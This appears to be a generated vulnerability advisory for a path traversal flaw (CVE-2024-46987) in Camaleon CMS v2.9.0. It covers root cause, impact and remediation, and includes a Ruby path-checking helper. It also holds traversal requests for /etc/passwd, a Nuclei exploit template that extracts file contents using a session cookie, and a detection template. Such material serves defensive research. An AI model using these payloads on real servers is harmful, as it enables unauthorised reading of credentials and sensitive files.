[webapps] Camaleon CMS v2.9.0 - Path Traversal
CVE-2024-46987
Camaleon CMS v2.9.0 contains a path traversal vulnerability that allows an attacker to read arbitrary files.
High · CVSS 7.5

📋 Vulnerability Summary
| CVE | CVE-2024-46987 |
|---|---|
| Vulnerability type | Path traversal |
| Affected version | Camaleon CMS v2.9.0 |
| Severity | High · CVSS 7.5 |
| Published | 2026-04-30 |
| Submitted by | Sakshi Velampudi (CyberQuestor) |
| Source | Exploit-DB (original advisory) |
🔬 Root Cause
In `app/controllers/camaleon_cms/media_controller.rb`, the file download function does not adequately validate the user-supplied `file_path` parameter. Path traversal sequences such as `../` are accepted, which makes it possible to read arbitrary files on the server.

🎯 Attack Scenario
1. Precondition: a valid, logged-in user session is required.
2. The attacker crafts a request containing a path traversal sequence, for example: `GET /media/download?file_path=../../../etc/passwd`.
3. The server returns the contents of the requested file, resulting in information disclosure.

💥 Impact
An attacker can read arbitrary files on the server, including configuration files, database credentials, source code and other sensitive data. The resulting information disclosure may in turn enable privilege escalation or lateral movement.
⚔️ Nuclei Exploit Template
The following exploit template is in standard Nuclei v3 format and can be used directly to verify the vulnerability:

```yaml
id: CVE-2024-46987-exploit

info:
  name: Camaleon CMS Path Traversal Exploit
  author: sakshi-velampudi
  severity: high
  description: Camaleon CMS v2.9.0 and earlier is vulnerable to path traversal through the private file download endpoint.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46987
    - https://www.exploit-db.com/exploits/52048
  tags: cve,cve2024,camaleon,cms,path-traversal

variables:
  auth_token: "{{token}}"
  file_path: "etc/passwd"

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/login"
    headers:
      Cookie: "auth_token={{auth_token}}"
    matchers:
      - type: word
        words:
          - "Camaleon CMS"
          - "camaleon-cms"
        condition: or
        case-insensitive: true
    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - 'Camaleon CMS v(\d+\.\d+\.\d+)'

  - method: GET
    path:
      - "{{BaseURL}}/admin/media/download_private_file?file=../../../../../../{{file_path}}"
    headers:
      Cookie: "auth_token={{auth_token}}"
    matchers:
      - type: word
        words:
          - "root:x:0:0"
          - "daemon:x:1:1"
          - "www-data:x:33:33"
        condition: or
        case-insensitive: true
    extractors:
      - type: regex
        name: file_content
        part: body
        regex:
          - '(.*)'
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected:

```yaml
id: CVE-2024-46987-detection

info:
  name: Camaleon CMS Path Traversal Detection
  author: sakshi-velampudi
  severity: high
  description: Camaleon CMS v2.9.0 and earlier is vulnerable to path traversal through the private file download endpoint.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46987
    - https://www.exploit-db.com/exploits/52048
  tags: cve,cve2024,camaleon,cms,path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/login"
    matchers:
      - type: word
        words:
          - "Camaleon CMS"
          - "camaleon-cms"
        condition: or
        case-insensitive: true
    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - 'Camaleon CMS v(\d+\.\d+\.\d+)'
      - type: regex
        name: version_meta
        part: body
        regex:
          - 'v(\d+\.\d+\.\d+)'

  - method: GET
    path:
      - "{{BaseURL}}/admin/media/download_private_file?file=../../../../../../etc/passwd"
    matchers:
      - type: word
        words:
          - "root:x:0:0"
          - "daemon:x:1:1"
        condition: or
        case-insensitive: true
    extractors:
      - type: regex
        name: vulnerable
        part: body
        regex:
          - 'root:.*:0:0:'
```

🛡️ Remediation
Upgrade to a version that fixes this vulnerability (a later patch release). As a temporary mitigation, validate the `file_path` parameter in `MediaController` against an allowlist, or restrict the resolved path so that it can only point inside the media directory.
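As an added example (not code from Camaleon CMS or from the advisory), the following Ruby helper shows the "restrict the path to the media directory" mitigation: it resolves the user-supplied value against an assumed media root and rejects any result that lands outside it. `MEDIA_ROOT`, `safe_media_path`, `traversal_attempt?` and the `/var/www/app/private_media` directory are names and values chosen for this example.

```ruby
require "pathname"

# Assumed media root for this example; the real Camaleon CMS layout may differ.
MEDIA_ROOT = Pathname.new("/var/www/app/private_media").freeze

class PathTraversalError < StandardError; end

# Resolve a user-supplied relative path against the media root and return the
# canonical absolute Pathname, or raise PathTraversalError if the result would
# lie outside the root. The check is lexical (Pathname#cleanpath), so it works
# whether or not the target exists; it does not follow symlinks, so the media
# directory itself must not contain links that point outside it.
def safe_media_path(user_input, root = MEDIA_ROOT)
  raise PathTraversalError, "empty path" if user_input.nil? || user_input.empty?
  # A NUL byte would truncate the path in the underlying C library calls.
  raise PathTraversalError, "NUL byte in path" if user_input.include?("\0")
  # Files inside the media area are always addressed relatively.
  raise PathTraversalError, "absolute path" if user_input.start_with?("/")

  candidate = (root + user_input).cleanpath # collapses "." and ".." segments
  # Compare with a trailing separator so "/media_old/x" cannot pass for "/media/..."
  # and so the root directory itself is never returned as a "file".
  unless candidate.to_s.start_with?(root.to_s + File::SEPARATOR)
    raise PathTraversalError, "path escapes media root: #{user_input.inspect}"
  end
  candidate
end

# Convenience predicate for tests and for logging rejected requests.
def traversal_attempt?(user_input, root = MEDIA_ROOT)
  safe_media_path(user_input, root)
  false
rescue PathTraversalError
  true
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: two legitimate names, two traversal attempts.
  ["2024/photo.jpg", "a/../b.png", "../../../../../../etc/passwd", "/etc/passwd"].each do |p|
    puts "#{p.inspect} => #{traversal_attempt?(p) ? 'REJECTED' : safe_media_path(p)}"
  end
end
```

Rack has already percent-decoded the query string by the time a controller sees `params`, so the check runs on the decoded value; run it before any `File.read` or `send_file` call.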
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 05:30 | Source: Exploit-DB